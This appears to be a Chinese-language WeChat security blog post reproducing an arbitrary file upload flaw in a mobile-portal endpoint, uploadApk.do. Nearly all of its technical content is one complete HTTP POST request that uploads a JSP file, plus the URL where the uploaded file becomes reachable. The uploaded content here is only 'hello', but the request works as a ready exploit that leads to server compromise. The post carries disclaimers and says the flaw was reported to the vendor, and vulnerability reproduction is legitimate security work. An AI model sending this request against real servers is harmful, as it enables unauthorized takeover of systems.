原创 背包客 Max安全研究院
Max安全研究院
微信号 baosec404
功能介绍 分享安全盛宴
__发表于
收录于合集
#技术文章 6 个
#漏洞复现 2 个
本公众号仅用作技术研究,利用此文提及到的知识造成的 **任何直接或者间接的后果及损失** **,** 均由使用者本人负责,本人 **不为此承担任何责任** , **本文中涉及的漏洞复现,均是自己搭建的本地靶场,禁止非法攻击未授权站点!!!** ****
uploadApk.do?pk_obj接口存在任意文件上传漏洞,通过漏洞攻击者可以获取服务器权限。
漏洞复现
发送请求包上传
POST /maportal/appmanager/uploadApk.do?pk_obj=0001A1100000000H66QB HTTP/1.1Host: 127.0.0.1:8080Content-Length: 198Cache-Control: max-age=0Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvLTG6zlX0gZ8LzO3User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: JSESSIONID=4ABE9DB29CA45044BE1BECDA0A25A091.serverConnection: close
------WebKitFormBoundaryvLTG6zlX0gZ8LzO3Content-Disposition: form-data; name="downloadpath"; filename="a.jsp"Content-Type: application/msword
hello------WebKitFormBoundaryvLTG6zlX0gZ8LzO3--
文件上传后的路径:http://ip/maupload/apk/a.jsp
备注:漏洞已提交平台,并通知厂商。请不要在网上测试非授权资产!
备注:漏洞已提交平台,并通知厂商。请不要在网上测试非授权资产!
备注:漏洞已提交平台,并通知厂商。请不要在网上测试非授权资产!
预览时标签不可点
微信扫一扫
关注该公众号
知道了
微信扫一扫
使用小程序
取消 允许
取消 允许
: , 。 视频 小程序 赞 ,轻点两下取消赞 在看 ,轻点两下取消在看